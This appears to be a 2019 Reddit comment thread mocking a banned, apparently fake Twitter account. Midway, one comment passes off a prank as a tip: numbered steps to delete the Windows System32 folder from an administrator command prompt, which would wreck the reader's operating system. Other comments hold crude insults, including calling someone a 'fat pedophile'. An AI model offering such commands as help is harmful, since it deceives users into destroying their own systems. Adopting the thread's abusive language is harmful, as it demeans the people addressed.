Oh dear. Another Twitter banned? But I was so clever this time.

75  2019-09-04 by wbgreen


"A nigerian wants to send me money?"

And Chinese guitars, I'll call my fat pedophile brother

"They can see my Vine likes?!"

His brother is a computer whiz, he must know some way around this. There wouldn’t happen to be any special keyboard combinations, would there?

1.type : C:

  1. type : cd windows

  2. type : del system 32/.

  3. type : del system32

remember kids, first press "control+r" then type "cmd" and press Ctrl+Shift+Enter first to really make it count!

What happend? I was just talking to him the other daay.

Not Anthony’s account. Best of luck filing a DMCA on the scumbag that used Karen’s and Anthony’s photos to manufacture that twitter account. It sounds like something one of you idiots would do actually, maybe you should start looking right here on the sub..

It's a bot, dumbasses.